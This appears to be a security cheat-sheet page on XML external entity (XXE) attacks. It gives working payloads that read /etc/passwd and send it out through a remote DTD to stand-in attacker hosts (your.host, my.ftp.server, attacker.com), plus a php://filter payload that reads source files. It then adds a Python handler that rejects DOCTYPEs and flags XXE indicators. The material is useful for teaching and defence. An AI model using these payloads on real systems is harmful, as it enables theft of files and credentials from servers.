
Exfiltration with remote DTD

It is not possible to refer to a parameter entity from inside another entity's declaration within the same DOCTYPE. This limitation comes from the way XML parsers process the internal DTD subset: a parameter-entity reference is not allowed inside a markup declaration there, so the declaration that nests the %file reference has to live in an external DTD.

<?xml version="1.0"?>
<!DOCTYPE data [
 <!ENTITY % file SYSTEM "file:///etc/passwd">
 <!ENTITY % dtd SYSTEM "http://your.host/remote.dtd">
%dtd;]>
<data>&send;</data>

On the remote server, the DTD hosted at http://your.host/remote.dtd contains:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'ftp://test:%file;@my.ftp.server/'>"> %all;

The attack is conducted as follows:

  1. The XML parser first processes the %file parameter entity, which loads the file /etc/passwd.
  2. Next, the XML parser makes a request to the attacker’s DTD file at http://your.host/remote.dtd
  3. After the XML parser processes the attacker’s DTD file, the %all parameter entity creates a general entity called &send, which contains a URL. This URL includes the file contents (e.g. *http://attacker.com/collect.php?collect=root:!:0:0::/:/usr/bin/ksh…*).
  4. Finally, after the URL is constructed, the XML parser processes the &send entity, which makes a request to the attacker’s server.
  5. The attacker can log the request on their end and reconstruct the file from the log entry.

Utilizing different protocols

<!DOCTYPE feed [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=./test_dev.php">
]>
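As an added, defender-side example that is not part of the original page: a Python handler for untrusted XML that rejects any document carrying a DOCTYPE before parsing, keeps external general and parameter entity resolution switched off as defence in depth, and flags the indicators that both the remote-DTD payload above and the php://filter payload in this section rely on. The sample documents are constructed from the page's payloads with placeholder hosts; the indicator names and function names are my own.

```python
"""
Defensive handling of untrusted XML: reject DTDs up front, keep external
entity resolution disabled in the parser anyway, and flag the indicators
the XXE payloads on this page depend on. Added example, not page code.
"""
import io
import re
import xml.sax
from xml.sax.handler import ContentHandler, EntityResolver
from xml.sax.handler import feature_external_ges, feature_external_pes

# Constructed sample inputs. The first two mirror the page's payloads with
# placeholder hosts; the third is a harmless document a service should accept.
OOB_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE data [
 <!ENTITY % file SYSTEM "file:///etc/passwd">
 <!ENTITY % dtd SYSTEM "http://your.host/remote.dtd">
%dtd;]>
<data>&send;</data>"""

PHP_FILTER_PAYLOAD = """<!DOCTYPE feed [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=./test_dev.php">
]>
<feed>&xxe;</feed>"""

BENIGN_DOC = """<?xml version="1.0"?><data><item>hello</item></data>"""

# Indicator patterns usable in a WAF rule or a log search. Names are ours.
INDICATORS = {
    "doctype":            re.compile(r"<!DOCTYPE\b", re.I),
    "entity_declaration": re.compile(r"<!ENTITY\b", re.I),
    "parameter_entity":   re.compile(r"<!ENTITY\s+%", re.I),
    "external_system_id": re.compile(r"\bSYSTEM\s+[\"']", re.I),
    "php_wrapper":        re.compile(r"\bphp://", re.I),
    "file_scheme":        re.compile(r"\bfile://", re.I),
}


def xxe_indicators(xml_text):
    """Return the names of every indicator present, in declaration order."""
    return [name for name, rx in INDICATORS.items() if rx.search(xml_text)]


class _TextCollector(ContentHandler):
    """Gathers character data so callers can see what the parser produced."""
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


class _RefusingResolver(EntityResolver):
    """Defence in depth: if external resolution were ever re-enabled, refuse it."""
    def resolveEntity(self, publicId, systemId):
        raise ValueError("external entity resolution refused: %r" % (systemId,))


def parse_untrusted(xml_text):
    """Parse XML from an untrusted source.

    Returns ("rejected", reason) when the document carries a DTD at all,
    ("error", message) when the parser itself rejects the input, or
    ("ok", text) with the concatenated character data on success.
    """
    if INDICATORS["doctype"].search(xml_text):
        return ("rejected", "DOCTYPE declarations are not accepted")
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)  # no external general entities
    parser.setFeature(feature_external_pes, False)  # no external parameter entities
    parser.setEntityResolver(_RefusingResolver())
    collector = _TextCollector()
    parser.setContentHandler(collector)
    try:
        parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    except xml.sax.SAXParseException as exc:
        return ("error", str(exc))
    return ("ok", "".join(collector.parts))


if __name__ == "__main__":
    samples = (("oob", OOB_PAYLOAD), ("php", PHP_FILTER_PAYLOAD), ("benign", BENIGN_DOC))
    for label, doc in samples:
        print(label, xxe_indicators(doc), parse_untrusted(doc))
```

The DOCTYPE gate is the control that actually matters: with no DTD accepted, neither the parameter-entity trick nor the php://filter wrapper has anywhere to be declared. The parser features and the refusing resolver only back that up in case the gate is bypassed or removed later, and the indicator list is what you would alert on in request logs.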